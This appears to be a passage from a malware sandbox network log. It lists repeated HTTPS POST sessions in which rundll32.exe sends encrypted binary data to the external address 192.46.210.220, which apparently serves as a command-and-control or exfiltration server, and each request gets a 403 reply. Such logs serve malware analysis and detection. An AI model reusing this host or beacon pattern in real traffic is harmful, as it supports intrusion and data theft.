                                                                                                        2021-10-28 03:06:02 UTC326OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:02 UTC331INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:02 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        67192.168.2.350085192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:03 UTC331OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:03 UTC331OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:03 UTC335INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:03 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        68192.168.2.350092192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:07 UTC336OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:07 UTC336OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:08 UTC345INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        69192.168.2.350093192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:07 UTC340OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:07 UTC340OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:08 UTC345INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.349772192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:00 UTC34OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:00 UTC34OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:01 UTC39INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:01 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        70192.168.2.350100192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:11 UTC345OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:11 UTC346OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:12 UTC355INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        71192.168.2.350101192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:11 UTC350OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:11 UTC350OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:12 UTC355INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        72192.168.2.350108192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:15 UTC355OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:15 UTC355OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:16 UTC365INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        73192.168.2.350109192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:15 UTC360OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:15 UTC360OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:16 UTC365INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        74192.168.2.350116192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:19 UTC365OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:19 UTC365OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:20 UTC375INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        75192.168.2.350117192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:19 UTC370OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:19 UTC370OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:20 UTC375INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        76192.168.2.350124192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:23 UTC375OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:23 UTC375OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:24 UTC385INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:24 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        77192.168.2.350125192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:23 UTC380OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:23 UTC380OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:06:24 UTC385INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:06:23 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        78192.168.2.350132192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:27 UTC385OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
